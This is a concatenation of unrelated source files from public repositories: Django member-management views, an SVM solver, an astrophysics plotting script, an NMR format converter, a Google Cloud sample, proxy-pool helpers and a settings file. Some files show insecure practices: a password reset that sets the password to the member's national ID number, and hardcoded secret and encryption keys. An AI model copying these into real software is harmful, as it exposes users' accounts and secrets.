        form = DesvincularLiderGrupoForm(data=request.POST)
        if form.is_valid():
            form.desvincular_lider()
            return JsonResponse({'url': reverse('miembros:editar_perfil', args=(miembro.id, ))})
        else:
            errors = get_error_forms_to_json(form)
            return JsonResponse(errors, safe=False)
    return JsonResponse({constants.RESPONSE_CODE: constants.RESPONSE_DENIED})
@login_required_api
@permission_required('miembros.es_administrador', raise_exception=True)
def resetear_contrasena(request):
    """Allow an administrator to reset a member's password (POST only).

    On success returns a JSON success code and a user-facing (Spanish)
    message; on form errors returns the serialized errors; any other
    method gets a RESPONSE_DENIED code.
    """
    msg = 'La contraseña se reseteó correctamente y se envió un email al miembro con su nueva contraseña.'
    msg2 = 'La nueva contraseña es la cedula del miembro.'
    if request.method == 'POST':
        form = ResetearContrasenaAdminForm(request.POST)
        if form.is_valid():
            form.resetear()
            return JsonResponse({
                # Bug fix: join the two sentences with a space; previously
                # they were concatenated directly ("...contraseña.La nueva...").
                'message': _(msg + ' ' + msg2),
                constants.RESPONSE_CODE: constants.RESPONSE_SUCCESS
            })
        errors = get_error_forms_to_json(form)
        return JsonResponse(errors, safe=False)
    return JsonResponse({constants.RESPONSE_CODE: constants.RESPONSE_DENIED})
|
[
"geovanni.berdugo@gmail.com"
] |
geovanni.berdugo@gmail.com
|
c14afc507b95a9c36595c24c46ae812c7fcc71c9
|
92993cff825da80a8ff601572a0c52b0b7d3cbde
|
/algorithms/Svm/APG/L1/APG_L1_m41.py
|
b1c19880dfe598d8378581b2300d5a68093c2d18
|
[] |
no_license
|
yingzhuoy/MRs-of-linear-models
|
06e8b1f84b08c6aa77553813824cf35c1806c5a7
|
c3df8299e039a12613f2022b370b8c3e9c2dd822
|
refs/heads/master
| 2023-04-07T23:09:37.736952
| 2021-04-04T05:33:37
| 2021-04-04T05:33:37
| 265,124,549
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,864
|
py
|
import numpy as np
from numpy import linalg
from algorithms.clf import Clf
# L1-svm
import cvxopt
from cvxopt import matrix,solvers
## accelerate proximal gradient method
def backtracking(l0, x0, p, q, low, up):
    """One backtracking line-search step for the box-projected gradient update.

    Shrinks the step size (starting from ``l0``) by a factor ``beta`` until
    the quadratic objective L(x) = 0.5*x'Px + q'x satisfies the
    sufficient-decrease condition, projecting each trial point onto the box
    [low, up] elementwise.

    :param l0: initial step size
    :param x0: current iterate, (m, 1) np.matrix
    :param p: quadratic term, (m, m) np.matrix
    :param q: linear term, (m, 1) np.matrix
    :param low, up: scalar box limits
    :return: (xp, l) -- the accepted point and the step size used
    """
    beta = 0.5
    l = l0
    L0 = 0.5 * x0.T * (p * x0) + q.T * x0
    g0 = p * x0 + q
    for k in range(128):
        xp = x0 - l * g0
        # Project the trial point onto the box constraints.
        xp[xp < low] = low
        xp[xp > up] = up
        Lx = 0.5 * xp.T * (p * xp) + q.T * xp
        gt = (x0 - xp) / l
        # Sufficient-decrease test. Bug fix: the previous revision (marked
        # "#----bug----") divided the step by the gradient term
        # (``l / (g0.T*gt)``); the Armijo-style condition multiplies.
        if Lx > L0 - l * (g0.T * gt) + 0.5 * l * gt.T * (gt):
            l = beta * l
        else:
            break
    return xp, l
def projected_apg(p, q, bounds, step_size=0.1, max_iter=5000):
    """Minimise 0.5*x'Px + q'x over the box [low, up]^m.

    Projected gradient descent with a backtracking line search; the initial
    step comes from the largest eigenvalue of the (regularised) P.

    :param p: (m, m) np.matrix quadratic term (shifted below for conditioning)
    :param q: (m, 1) np.matrix linear term
    :param bounds: (low, up) scalar box limits applied elementwise
    :param step_size: unused -- the step is derived from the eigenvalue bound
    :param max_iter: iteration cap
    :return: (m, 1) np.matrix minimiser estimate
    """
    m = p.shape[0]
    low, up = bounds
    # Start in the interior of the box.
    x = np.ones((m, 1), np.float64) * 0.5
    y = x
    # Diagonal shift keeps the (possibly near-singular) matrix well conditioned.
    p = p + np.diag(np.ones(m, np.float64)) * np.mean(p)
    v, w = np.linalg.eigh(p)
    # print(v)
    # v[v < 0] = 1e-10
    # p = w * np.diag(v) * w.T
    # Initial step: just under the inverse of the largest eigenvalue.
    l = 1/v[-1] - 1e-10
    for k in range(max_iter):  # heavy on matrix operations
        # p = p + np.eye(p.shape[0]) * (.1/(k+1))
        # saving previous x
        y = x
        # compute loss and its gradient
        # gradient = p*x + q
        # proximal mapping
        # x = x - l * gradient
        # x[x < low] = low
        # x[x > up] = up
        x, l = backtracking(l, y, p, q, low, up)
        # if(np.linalg.norm(x1-x)):
        # print('error', np.linalg.norm(x1-x))
        # Stop criterion: relative change between successive iterates.
        rnormw = np.linalg.norm(y-x) / (1+np.linalg.norm(x))
        if k > 1 and rnormw < 1e-6:
            #print('convergence!')
            break
    return x
class APG_L1_m41():
    """L1-loss linear SVM trained via accelerated projected gradient (variant m41)."""

    def fit(self, X, y):
        """Fit a linear SVM and return a Clf(w, b) separating hyperplane.

        The bias is absorbed by appending a constant-1 column to X, so the
        dual becomes a box-constrained QP solved by projected_apg.
        """
        m, n = X.shape
        # Absorb the bias term as an extra feature column of ones.
        X = np.column_stack((X, np.ones((m, 1))))
        y = y.astype(np.float64)
        data_num = len(y)
        C = 1.0  # box constraint on the dual variables
        kernel = np.dot(X, np.transpose(X))
        # (translated) np.outer multiplies every element of the first vector
        # with every element of the second, one row per element.
        # p = np.matrix(kernel * np.outer(y, y)) * .5
        # kernel = np.dot(X, np.transpose(X)) + np.eye(data_num) * (.5 / C)
        p = np.matrix(np.multiply(kernel, np.outer(y, y)), np.float64)
        q = np.matrix(-np.ones([data_num, 1], np.float64))
        # Small ridge on the diagonal for numerical stability.
        p = p + np.eye(data_num) * 0.1
        bounds = (0, C)
        alpha_svs = projected_apg(p, q, bounds)
        # alpha_svs = alpha_svs1
        y1 = np.reshape(y, (-1, 1))
        alpha1 = alpha_svs
        lambda1 = np.multiply(y1, alpha1)
        w = np.dot(X.T, lambda1)
        w = np.array(w).reshape(-1)
        # b = np.mean(y1-np.reshape(np.dot(w, np.transpose(X)), [-1, 1]))
        # Last weight belongs to the constant column, i.e. the bias.
        b = w[n]
        w = w[0:n]
        clf = Clf(w, b)
        return clf
|
[
"yingzhuoy@qq.com"
] |
yingzhuoy@qq.com
|
dd0fa4ba786eb9d8f8734622a18724a5acb42751
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/verbs/_occasioned.py
|
f6245b1a5cf35679f3af0adee45fb97bbfcfd1d5
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 254
|
py
|
from xai.brain.wordbase.verbs._occasion import _OCCASION
# class header
class _OCCASIONED(_OCCASION, ):
    """Verb entry for the past-tense form 'occasioned'; behaviour comes from _OCCASION."""

    def __init__(self,):
        _OCCASION.__init__(self)
        self.name = "OCCASIONED"
        # Part-of-speech bucket and the lemma this form maps back to.
        self.specie = 'verbs'
        self.basic = "occasion"
        self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
f1e5a981d26f50623a516c785ceb31ecc02bb287
|
2ed82c46dc08930bcf1a42bae6b50d0efd6e8899
|
/rho_T_plot/rhoTPlot_physical_EAGLE.py
|
1cb7f4fbbecf9894e961a7fa20fcaa11d676d703
|
[
"MIT"
] |
permissive
|
SWIFTSIM/swiftsimio-examples
|
3a96fb910c42fe90cd48a0974ea3b16678214204
|
f038df3aa12a129185857b5cee2d4a7c2c6b4d03
|
refs/heads/master
| 2020-04-30T23:01:02.966239
| 2020-02-14T12:18:09
| 2020-02-14T12:18:09
| 177,133,622
| 0
| 1
|
MIT
| 2020-02-14T12:18:11
| 2019-03-22T12:10:18
|
Python
|
UTF-8
|
Python
| false
| false
| 4,289
|
py
|
"""
Makes a rho-T plot. Uses the swiftsimio library.
"""
import matplotlib.pyplot as plt
import numpy as np
import h5py
from unyt import mh, cm, Gyr
from tqdm import tqdm
from matplotlib.colors import LogNorm
from matplotlib.animation import FuncAnimation
# Constants; these could be put in the parameter file but are rarely changed.
density_bounds = [1e-8, 1e5] # in nh/cm^3
temperature_bounds = [10 ** (3), 10 ** (8)] # in K
bins = 128
VMIN, VMAX = [1e0, 7.5e5]
# Plotting controls
cmap = "viridis"
def load_data(filename: str, n_files: int, to_read: str):
    """
    Loads the data from snapshots made of multiple files.

    Reads the dataset ``to_read`` from each of the ``n_files`` HDF5 files
    named ``{filename}.{file}.hdf5`` and concatenates them into one array.
    """
    output = []
    for file in tqdm(range(n_files), desc=f"Reading {to_read}"):
        # Bug fix: the snapshot stub passed in as ``filename`` was never
        # used when building the per-file path.
        current_filename = f"{filename}.{file}.hdf5"
        with h5py.File(current_filename, "r") as handle:
            output.append(handle[to_read][...])
    return np.concatenate(output)
def get_data(filename, n_files):
    """
    Grabs the data (T in Kelvin and density in mh / cm^3).

    Converts the raw comoving density into a physical hydrogen number
    density using the scale factor and h read from the first file's header.
    """
    density = load_data(filename, n_files, "PartType0/Density")
    # Already in K
    temperature = load_data(filename, n_files, "PartType0/Temperature")
    # Bug fix: build the header path from the snapshot stub instead of a
    # hard-coded placeholder.
    with h5py.File(f"{filename}.0.hdf5", "r") as handle:
        print(handle["Header"].attrs["NumPart_Total"])
        scale_factor = handle["Header"].attrs["Time"]
        h = handle["Header"].attrs["HubbleParam"]
        unit_density = handle["Units"].attrs["UnitDensity_in_cgs"]
    # Hydrogen mass in grams. NOTE(review): this shadows the ``mh`` imported
    # from unyt at module level so the division stays in plain floats.
    mh = 1.673_723_6e-24
    unit_density /= mh
    print(len(density))
    density *= unit_density
    # h^2 and a^-3 factors turn the comoving density into a physical one.
    density *= h ** 2
    density /= scale_factor ** 3
    return density, temperature
def make_hist(filename, n_files, density_bounds, temperature_bounds, bins):
    """
    Makes the histogram for filename with bounds as lower, higher
    for the bins and "bins" the number of bins along each dimension.

    Also returns the edges for pcolormesh to use.
    """
    # Logarithmically spaced bin edges in both dimensions.
    density_bins = np.logspace(
        np.log10(density_bounds[0]), np.log10(density_bounds[1]), bins
    )
    temperature_bins = np.logspace(
        np.log10(temperature_bounds[0]), np.log10(temperature_bounds[1]), bins
    )
    H, density_edges, temperature_edges = np.histogram2d(
        *get_data(filename, n_files), bins=[density_bins, temperature_bins]
    )
    # Transpose so rows correspond to temperature, as pcolormesh expects.
    return H.T, density_edges, temperature_edges
def setup_axes():
    """Create and return the (figure, axes) pair used for the phase-space plot."""
    figure, axes = plt.subplots(1, figsize=(6, 5), dpi=300)
    # Both axes are logarithmic; labels carry the plotted units.
    axes.loglog()
    axes.set_xlabel("Density [$n_H$ cm$^{-3}$]")
    axes.set_ylabel("Temperature [K]")
    return figure, axes
def make_single_image(filename, n_files, density_bounds, temperature_bounds, bins):
    """
    Makes a single image and saves it to rhoTPlot_EAGLE.png.

    Filename should be given _without_ hdf5 extension.
    """
    fig, ax = setup_axes()
    hist, d, T = make_hist(filename, n_files, density_bounds, temperature_bounds, bins)
    # Log-scaled colour map over the fixed global range (VMIN/VMAX) so
    # different snapshots are directly comparable.
    mappable = ax.pcolormesh(d, T, hist, cmap=cmap, norm=LogNorm(vmin=VMIN, vmax=VMAX))
    fig.colorbar(mappable, label="Number of particles", pad=0)
    fig.tight_layout()
    fig.savefig("rhoTPlot_EAGLE.png")
    return
if __name__ == "__main__":
    import argparse as ap

    parser = ap.ArgumentParser(
        description="""
        Plotting script for making a rho-T plot.
        Takes the filename handle, start, and (optionally) stop
        snapshots. If stop is not given, png plot is produced for
        that snapshot. If given, a movie is made.
        """
    )
    parser.add_argument(
        "-s",
        "--stub",
        help="""Stub for the filename (e.g. santabarbara). This is
        the first part of the filename for the snapshots,
        not including the final underscore. Required.""",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-n",
        "--nfiles",
        help="""Number of EAGLE files to read""",
        type=int,
        required=True,
    )
    # Run in single image mode.
    args = vars(parser.parse_args())
    # Density/temperature bounds and bin count come from the module-level
    # constants at the top of the file.
    make_single_image(
        args["stub"],
        n_files=args["nfiles"],
        density_bounds=density_bounds,
        temperature_bounds=temperature_bounds,
        bins=bins,
    )
|
[
"joshua.borrow@durham.ac.uk"
] |
joshua.borrow@durham.ac.uk
|
98c7fc6457ff198ee87f3568232bf6841406a99e
|
eacfc1c0b2acd991ec2cc7021664d8e79c9e58f6
|
/ccpnmr2.4/python/ccpnmr/format/converters/PalesFormat.py
|
cd5aa27d66e02596823c00d666e4173bae16967a
|
[] |
no_license
|
edbrooksbank/ccpnmr2.4
|
cfecb0896dcf8978d796e6327f7e05a3f233a921
|
f279ca9bb2d972b1ce075dad5fcc16e6f4a9496c
|
refs/heads/master
| 2021-06-30T22:29:44.043951
| 2019-03-20T15:01:09
| 2019-03-20T15:01:09
| 176,757,815
| 0
| 1
| null | 2020-07-24T14:40:26
| 2019-03-20T14:59:23
|
HTML
|
UTF-8
|
Python
| false
| false
| 6,344
|
py
|
#!/usr/bin/python
"""
======================COPYRIGHT/LICENSE START==========================
ModuleFormat.py: Contains functions specific to PALES program conversions.
Copyright (C) 2010 Wim Vranken (European Bioinformatics Institute)
Brian Smith (University of Glasgow)
=======================================================================
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
A copy of this license can be found in ../../../../license/LGPL.license
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
======================COPYRIGHT/LICENSE END============================
for further information, please contact :
- CCPN website (http://www.ccpn.ac.uk/)
- MSD website (http://www.ebi.ac.uk/msd/)
- contact Wim Vranken (wim@ebi.ac.uk)
=======================================================================
If you are using this software for academic purposes, we suggest
quoting the following references:
===========================REFERENCE START=============================
R. Fogh, J. Ionides, E. Ulrich, W. Boucher, W. Vranken, J.P. Linge, M.
Habeck, W. Rieping, T.N. Bhat, J. Westbrook, K. Henrick, G. Gilliland,
H. Berman, J. Thornton, M. Nilges, J. Markley and E. Laue (2002). The
CCPN project: An interim report on a data model for the NMR community
(Progress report). Nature Struct. Biol. 9, 416-418.
Wim F. Vranken, Wayne Boucher, Tim J. Stevens, Rasmus
H. Fogh, Anne Pajon, Miguel Llinas, Eldon L. Ulrich, John L. Markley, John
Ionides and Ernest D. Laue (2005). The CCPN Data Model for NMR Spectroscopy:
Development of a Software Pipeline. Proteins 59, 687 - 696.
===========================REFERENCE END===============================
"""
import string
from ccpnmr.format.converters.DataFormat import DataFormat, IOkeywords
from ccp.format.general.Constants import defaultSeqInsertCode
from ccpnmr.format.general.Constants import distanceConstraintDefaultLowerLimit
from ccpnmr.format.general.Util import getNameInfo
from ccp.general.Util import getResonancesFromPairwiseConstraintItem
class PalesFormat(DataFormat):
    """Format converter for the PALES RDC back-calculation program.

    Python 2 code (note the print statements); adds RDC-constraint export
    behaviour on top of the generic DataFormat machinery.
    """

    def setFormat(self):
        self.format = 'pales'
        self.IOkeywords = IOkeywords

    def setGenericImports(self):
        # PALES reuses the generic constraint read/write machinery.
        self.getConstraints = self.getConstraintsGeneric
        self.createConstraintFile = self.createConstraintFileGeneric

    #
    # Functions different to default functions in DataFormat
    #

    def setRawRdcConstraint(self):
        """Append a raw RDC constraint built from the current CCPN constraint."""
        self.constraintFile.constraints.append(self.rawConstraintClass(self.constraint.serial))
        self.rawConstraint = self.constraintFile.constraints[-1]
        #
        # Have to get some sensible values out
        #
        lowerLimit = self.constraint.lowerLimit
        upperLimit = self.constraint.upperLimit
        targetValue = self.constraint.targetValue
        if targetValue == None:
            # No explicit target value: use the midpoint of the limits.
            targetValue = (lowerLimit + upperLimit) / 2
        self.rawConstraint.setRdcData(targetValue,error = self.constraint.error)

    def setRawRdcConstraintItem(self):
        self.rawConstraint.items.append(self.rawConstraintItemClass())
        self.rawConstraintItem = self.rawConstraint.items[-1]

    def setRawRdcConstraintItemMembers(self):
        """Add the two resonance members (atoms) of the current constraint item."""
        itemResonances = getResonancesFromPairwiseConstraintItem(self.item)
        for i in range(0,2):
            (chainCode,seqCode,spinSystemId,seqInsertCode,atomName) = getNameInfo(self.resSetNames[i])
            resLabel = self.getResonanceResLabel(itemResonances[i])
            self.rawConstraintItem.members.append(self.rawConstraintItemMemberClass(chainCode,seqCode,resLabel,atomName))

    def getPresetChainMapping(self,chainList):
        return self.getSingleChainFormatPresetChainMapping(chainList)

    def getResonanceResLabel(self,resonance):
        """Return the residue label for ``resonance`` in the target naming system.

        Falls back to the upper-cased ccpCode when no system-specific name
        is defined.
        """
        # copied from DyanaFormat.py (also in AquaFormat.py - scope for common function in Util?)
        resLabel = None
        chemCompVar = resonance.resonanceSet.findFirstAtomSet().findFirstAtom().residue.chemCompVar
        namingSystem = chemCompVar.chemComp.findFirstNamingSystem(name = self.namingSystemName)
        chemCompSysName = chemCompVar.findFirstSpecificSysName(namingSystem = namingSystem)
        if not chemCompSysName:
            chemCompSysName = chemCompVar.findFirstChemCompSysName(namingSystem = namingSystem)
        if chemCompSysName:
            resLabel = chemCompSysName.sysName
        else:
            resLabel = chemCompVar.chemComp.ccpCode.upper()
        return resLabel

    def createConstraintFileFormatSpecific(self):
        """Collect the single molecule sequence that PALES needs in its output."""
        # Here bit tricky because first have to get number of chains, and format
        # doesn't really handle it. I'd do this by having a specific
        # chain keyword for writing RDC constraints for PALES, if it's not set
        # and there's only one chain, all good, otherwise throw an
        # error or ask the user for the relevant chain, then filter out
        # constraints (that's all in place in case it's needed, just ask). Wim
        # I do something similar already in DataFormat.py, but it happens at a later stage in the workflow.
        chains = []
        for constraint in self.constraintList.constraints:
            for item in constraint.sortedItems():
                for fixedResonance in item.resonances:
                    if fixedResonance.resonanceSet:
                        refAtom = fixedResonance.resonanceSet.findFirstAtomSet().findFirstAtom()
                        if refAtom.residue.chain not in chains:
                            chains.append(refAtom.residue.chain)
        seqStrings = []
        for chain in chains:
            # Filter out most ligands, hopefully.
            if len(chain.residues) > 1:
                seqStrings.append(chain.molecule.seqString)
        if len(seqStrings) > 1:
            print "Warning: multiple sequences present, picking first one"
            print 'in', self
        self.writeKeywds['oneLetterSequence'] = seqStrings[0]
|
[
"ejb66@le.ac.uk"
] |
ejb66@le.ac.uk
|
982438385f1000e3976346a2dc1120aabdcb9938
|
c66955c6fc178955c2024e0318ec7a91a8386c2d
|
/headfirst/example/example2.py
|
6f06549a6c1978e95a4a31f7b5543a9d99fc5481
|
[] |
no_license
|
duheng18/python-study
|
a98642d6ee1b0043837c3e7c5b91bf1e28dfa588
|
13c0571ac5d1690bb9e615340482bdb2134ecf0e
|
refs/heads/master
| 2022-11-30T17:36:57.060130
| 2019-11-18T07:31:40
| 2019-11-18T07:31:40
| 147,268,053
| 1
| 0
| null | 2022-11-22T03:36:51
| 2018-09-04T00:49:42
|
Python
|
UTF-8
|
Python
| false
| false
| 751
|
py
|
# Lines spoken by each character in the sketch, in order of appearance.
man = []
other = []
try:
    # ``with`` guarantees the file is closed even if parsing raises;
    # the previous explicit close() leaked the handle on error paths.
    with open('/Users/duheng/Documents/HeadFirstPython/chapter3/sketch.txt', 'r', encoding='utf-8') as data:
        for each_line in data:
            try:
                (role, line_spoken) = each_line.split(':', 1)
                line_spoken = line_spoken.strip()
                if role == 'Man':
                    man.append(line_spoken)
                elif role == 'Other Man':
                    other.append(line_spoken)
            except ValueError:
                # Lines without a ':' separator carry no dialogue; skip them.
                pass
except IOError:
    print('The data file is missing!')
try:
    # Write each character's lines to its own file; both handles are closed
    # automatically, even if the second open or a write fails.
    with open('man_data.txt', 'w') as man_file, \
            open('other_data.txt', 'w') as other_file:
        print(man, file=man_file)
        print(other, file=other_file)
except IOError:
    print('File error.')
|
[
"emaildh@163.com"
] |
emaildh@163.com
|
0ec907252b0568f7621cb0e98415d6dc0de57206
|
5da5473ff3026165a47f98744bac82903cf008e0
|
/packages/google-cloud-channel/samples/generated_samples/cloudchannel_v1_generated_cloud_channel_service_provision_cloud_identity_async.py
|
294b8255ef654e0f099f9422b69dfee53a729aba
|
[
"Apache-2.0"
] |
permissive
|
googleapis/google-cloud-python
|
ed61a5f03a476ab6053870f4da7bc5534e25558b
|
93c4e63408c65129422f65217325f4e7d41f7edf
|
refs/heads/main
| 2023-09-04T09:09:07.852632
| 2023-08-31T22:49:26
| 2023-08-31T22:49:26
| 16,316,451
| 2,792
| 917
|
Apache-2.0
| 2023-09-14T21:45:18
| 2014-01-28T15:51:47
|
Python
|
UTF-8
|
Python
| false
| false
| 2,026
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for ProvisionCloudIdentity
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-channel
# [START cloudchannel_v1_generated_CloudChannelService_ProvisionCloudIdentity_async]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import channel_v1
async def sample_provision_cloud_identity():
    """Demonstrate CloudChannelService.ProvisionCloudIdentity with the async client."""
    # Create a client
    client = channel_v1.CloudChannelServiceAsyncClient()
    # Initialize request argument(s)
    request = channel_v1.ProvisionCloudIdentityRequest(
        customer="customer_value",
    )
    # Make the request
    operation = client.provision_cloud_identity(request=request)
    print("Waiting for operation to complete...")
    # Await the long-running operation, then fetch its final result.
    response = (await operation).result()
    # Handle the response
    print(response)
# [END cloudchannel_v1_generated_CloudChannelService_ProvisionCloudIdentity_async]
|
[
"noreply@github.com"
] |
googleapis.noreply@github.com
|
64a7d6b3abb2ff86e6c68063872fb3310bc2f17e
|
0265e740dbc38ab543236a12d98ee9e0b57cb927
|
/crawler_world/proxy_pool/Util/utilFunction.py
|
2d8f46d84651dfe2e5f6940874d6370dc351f9c4
|
[
"MIT"
] |
permissive
|
ForeverDreamer/scrapy_learning
|
c5e604c6a285fa6fef112bdc5617b2129288477a
|
6d38c58af5b8ba87803ee77de61f2a54cc65a4db
|
refs/heads/master
| 2023-05-13T18:46:43.715685
| 2022-09-22T10:26:11
| 2022-09-22T10:26:11
| 179,958,600
| 0
| 0
| null | 2023-05-01T19:51:39
| 2019-04-07T11:48:43
|
Python
|
UTF-8
|
Python
| false
| false
| 4,154
|
py
|
# -*- coding: utf-8 -*-
# !/usr/bin/env python
"""
-------------------------------------------------
File Name: utilFunction.py
Description : tool function
Author : JHao
date: 2016/11/25
-------------------------------------------------
Change Activity:
2016/11/25: 添加robustCrawl、verifyProxy、getHtmlTree
-------------------------------------------------
"""
import requests
import time
from bs4 import BeautifulSoup
import re
from Util.LogHandler import LogHandler
from Util.WebRequest import WebRequest
# logger = LogHandler(__name__, stream=False)
def tcpConnect(proxy):
    """
    TCP three-way-handshake reachability probe.

    :param proxy: "ip:port" string
    :return: True if the TCP connection succeeds, False otherwise
    """
    from socket import socket, AF_INET, SOCK_STREAM
    ip, port = proxy.split(':')
    # Use the socket as a context manager so the file descriptor is always
    # released; the previous version leaked one socket per call.
    with socket(AF_INET, SOCK_STREAM) as s:
        result = s.connect_ex((ip, int(port)))
    return result == 0
# noinspection PyPep8Naming
def robustCrawl(func):
    """
    Decorator that makes a crawl function best-effort: any exception raised
    by ``func`` is swallowed and the wrapper returns None instead.

    The swallow is deliberate (the original logged the error); it keeps the
    crawler running across individual page failures.
    """
    from functools import wraps

    @wraps(func)  # preserve the wrapped function's name/docstring
    def decorate(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except Exception as e:
            pass
            # logger.info(u"sorry, crawl failed. reason:")
            # logger.info(e)
    return decorate
# noinspection PyPep8Naming
def verifyProxyFormat(proxy):
    """
    Check that ``proxy`` is exactly of the form ``http(s):ip:port``.

    :param proxy: candidate proxy string
    :return: True when the whole string matches, False otherwise
    """
    import re
    pattern = r"https?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}"
    # fullmatch anchors at both ends, which is equivalent to the old
    # findall-then-compare-with-the-whole-string check.
    return re.fullmatch(pattern, proxy) is not None
# noinspection PyPep8Naming
def getHtmlTree(url, proxy_ip):
    """Fetch ``url`` and return it parsed as a BeautifulSoup tree.

    ``proxy_ip`` is currently unused: proxying the request is still a TODO
    (see the commented-out code below) and the call goes out directly.
    """
    # TODO: fetch through the given proxy server instead of directly.
    wr = WebRequest()
    # delay 2s for per request
    time.sleep(2)
    # ip, port, prot = proxy_ip.split(':')
    # proxies = {prot: '{}://{}:{}'.format(prot, ip, port)}
    #
    html = wr.get(url, proxies=None).text
    return BeautifulSoup(html, features='lxml')
def extract_ip(ip_info):
    """
    Build a "protocol:ip:port" string from a raw HTML/text fragment.

    Falls back to 'http' when no protocol token appears. When the ip or
    port pattern is absent, the (empty) match list itself ends up in the
    formatted string, mirroring the original behaviour for malformed input.
    """
    addr = re.findall(r'\d+\.\d+\.\d+\.\d+', ip_info)
    addr = addr[0] if addr else addr
    port = re.findall(r'(\d{4,5})<', ip_info)
    port = port[0] if port else port
    proto = re.findall(r'https?|HTTPS?', ip_info)
    proto = proto[0].lower() if proto else 'http'
    return "{}:{}:{}".format(proto, addr, port)
# noinspection PyPep8Naming
# def validUsefulProxy(proxy):
# url = "http://ip.tool.chinaz.com/" # 查自己的ip
# # url = "http://www.ip138.com/" # 查自己的ip
# ip, port, prot = proxy.split(':')
#
# try:
# proxies = {
# 'protocol': '{}://{}:{}'.format(prot, ip, port)
# }
# r = requests.get(url, proxies=proxies, timeout=10, verify=False)
# soup = BeautifulSoup(r.text, 'lxml')
#
# parent_node = soup.find(class_="IpMRig-tit")
#
# if ip == soup.find(class_="fz24").get_text():
# for i in parent_node.find_all('dd'):
# print(i.get_text())
#
# return True
# except Exception as e:
# print(e)
#
# return False
def validUsefulProxy(proxy):
    """
    Validate a proxy by fetching an IP-echo page through it.

    The proxy counts as usable when the remote address the echo server
    reports equals the proxy's own IP, i.e. the proxy actually relayed
    the request.

    :param proxy: "protocol:ip:port" string
    :return: True when the echoed address matches the proxy IP, else False
    """
    url = "http://crawleruniverse.com:8000/ct/ri"  # echoes the caller's IP
    prot, ip, port = proxy.split(':')
    try:
        proxies = {
            prot: '{}://{}:{}'.format(prot, ip, port)
        }
        r = requests.get(url, proxies=proxies, timeout=10, verify=False)
        soup = BeautifulSoup(r.text, 'lxml')
        # The echo page carries the forwarded-for chain in <h4> and the
        # observed remote address in <h5>.
        http_x_forwarded_for = re.findall(r'\d+.\d+.\d+.\d+', str(soup.find("h4")))
        remote_addr = re.findall(r'\d+.\d+.\d+.\d+', str(soup.find("h5")))[0]
        if ip == remote_addr:
            print('http_x_forwarded_for: {}, remote_addr: {}, ip: {}, pass: {}'.format(http_x_forwarded_for,
                                                                                       remote_addr,
                                                                                       ip,
                                                                                       ip == remote_addr))
            return True
    except Exception as e:
        # pass
        print(e)
    return False
|
[
"499361328@qq.com"
] |
499361328@qq.com
|
69749573e1c7329b67e11083405f953765a7d54d
|
cd2ce8e913048a535d7680789d38a16f23ad04b3
|
/server/settings/local.py
|
bdfb750ad6a8b98893ae27a61c1b35837399a5c8
|
[] |
no_license
|
wade333777/cocos-js-tips
|
3758bbaccb168c1a7f4d17e243e8107cb9fbfb06
|
4f430d5631b1118ad251bdaf8384bc0dbdaf07b9
|
refs/heads/master
| 2021-01-20T20:35:48.273690
| 2016-06-22T10:02:15
| 2016-06-22T10:02:15
| 60,678,664
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,508
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from base import *
# Enable debug mode
DEBUG = True
# ============================================================================
CHANNEL = "android"  # [lowercase only]
WEB_KEY = 'spyykimech'
GAME_KEY = ')7yt4e!#)gcy&#0^hlme-+082=s!b!$8+h$+(j0bucx0+nu%pe'
# Symmetric-cipher key (32 chars) and IV (16 chars) for payload
# encode/decode -- presumably AES; confirm against the cipher code.
ENCODE_DECODE_KEY = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
ENCODE_DECODE_IV = "1234567812345678"
# SECRET_KEY = ')7yt4e!#)gcy&#0^hlme-+082=s!b!$8+h$+(j0bucx0+nu%pe'
# ============================================================================
# Stats reporting via a local Scribe collector.
STATS_SWITCH = True
SCRIBE_SERVER = '127.0.0.1'
SCRIBE_PORT = 8250
# ============================================================================
# Logger configuration: weekly-rotated ("W0") file handlers for the app
# log and the HTTP access log.
LOGGER = {
    'tornado': {
        "OPEN": True,
        "LEVEL": "INFO",
        "HANDLERS": [
            {
                "module": "torngas.logger.CustomRotatingFileHandler",
                "filename": "info",
                "when": "W0",
                "encoding": "utf-8",
                "delay": True,
                "backupCount": 100,
            }
        ]
    },
    'torngas.accesslog': {
        "OPEN": True,
        "LEVEL": "INFO",
        "FORMATTER": '%(message)s',
